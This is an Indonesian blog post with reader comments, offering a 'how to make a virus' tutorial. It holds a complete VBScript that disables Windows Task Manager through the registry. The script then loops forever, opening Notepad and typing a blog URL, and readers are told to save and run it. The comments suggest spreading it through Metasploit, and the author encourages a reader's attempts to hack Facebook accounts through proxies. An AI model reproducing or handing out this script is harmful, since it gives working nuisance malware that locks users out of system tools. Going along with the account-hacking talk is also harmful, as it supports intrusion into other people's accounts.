Selasa, 03 Juli 2012

7 Cara membuat virus

   Disini saya akan menjelaskan cara membuat virus dengan pudah tapi ampuh,,,,
berikut ini adalah cara-cara membuat virus :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

WScript.Sleep 18000
WScript.Sleep 1000
do
Set klikbebas = WScript.CreateObject("WScript.Shell")
klikbebas.Run "notepad"
WScript.Sleep 100
klikbebas.AppActivate "Notepad"
WScript.Sleep 500
klikbebas.SendKeys "K"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "j"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys " "
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "e"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "a"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "p"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "c"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "m"
WScript.Sleep 500
wscript.sleep 5000
loop

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal virus.vbs)

3. Mau dicoba hasil virus yang kamu buat? tinggal klik aja deh 2x, dan nikmatilah hasilnya.

cara menghentikanyapun sangat mudah dengan Task Manager Ctrl + Alt + Delete sudah tidak bisa.

Ok, ikutilah langkah-langkah mengaktifkan kembali Task Manager :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal ini antivirus.vbs)

3. Jalankan file vbs yang sudah dibuat tersebut, coba buka Task Manager dengan cara tekan Ctrl + Alt + Delete yang ada di keyboard tentunya.


Selesai dah cara membuat virus gadungan kelas teri. Seperti itulah virus dan antivirus dibuat, tapi ini contoh....

silahkan mencoba ya.....??????

7 comments

4 Juli 2012 01.53

wahh ada bakat kamu untuk jadi hacker spertinya..

hehe.. asah terus semoga menjadi profesional :)

tar aku buat antivirus dari virus ini ah.. :P

salam persahabatan.

please visit, i will visit back : JadikanPinter!

4 Juli 2012 03.17

izin ngopi scipnya sob

4 Juli 2012 09.14

@Isnan Nugrah Lastikothanks sob... gw cm coba-coba aje eh.. ternyata berhasil....

5 Juli 2012 00.45

@Widodosilahka dengan senang hati.. sebarin lewat metasploit chok....

13 Juli 2012 00.27

numpang ngopy bang ya, thanks trick nya, bisa pake nambah elmo. oya bang tu trik tuk hack fb kok nggak mau ya, padahal dah ganti pake beberapaproxy. ada saran buat ane ndk bang spaya bisa ke pake.
ato mungkin tdi donludnya ndk ijin sama yang punya kali ya, he he he..., lanjutkan bang, tambah trik yang banyak lagi

17 Juli 2012 09.32

@tur muzi ya memang susah cari proxynya.. selain itu koneksi internet kita juga harus cepat.. coba terus ajd.. tetap semangat..

4 November 2012 09.06

gk mw nyoba2 ah ntar virusan laptop ane ixixix komen back yaw

Posting Komentar

peluang usaha

Followers

Buku Tamu

Total Pageviews